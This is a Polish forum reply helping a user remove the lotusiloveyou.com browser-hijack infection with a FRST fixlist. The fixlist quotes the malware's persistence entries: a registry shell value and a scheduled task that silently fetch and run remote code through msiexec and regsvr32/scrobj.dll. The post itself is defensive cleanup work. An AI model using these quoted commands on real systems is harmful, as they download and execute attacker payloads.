Skocz do zawartości

Problem z lotusiloveyou.com


Rekomendowane odpowiedzi

Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Ta sławna infekcji faktycznie zagościła u Ciebie w systemie. To błahostka, więc nie ma się czym przejmować. Już w pierwszym kroki zostanie usunięta. 

 

1. Otwórz Notatnik w nim wklej: 

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDN8MjUcEeqxMWLdw2FxGdY1NWJaMWLlEjH4ZH== /q
IFEO\taskmgr.exe: [Debugger]
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
U3 awldyuog; C:\Users\Toshiba\AppData\Local\Temp\awldyuog.sys [56584 2017-04-30] (GMER) [brak podpisu cyfrowego] 
S4 sptd2; System32\Drivers\sptd2.sys [X]
Task: {1C4C77C9-1292-4908-8435-57EA5763DEFD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPDN8MjUcEeqxMWLdw2FxGdY1NWJaMWLlEjH4ZH== scrobj.dll
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Toshiba\AppData\Local\Mozilla
C:\Users\Toshiba\AppData\Roaming\Mozilla
C:\Users\Toshiba\AppData\Roaming\Profiles
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Nie rób nowych logów, dostarcz tylko raport wynikowy (plik Fixlog). Napisz czy problem ustąpił.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...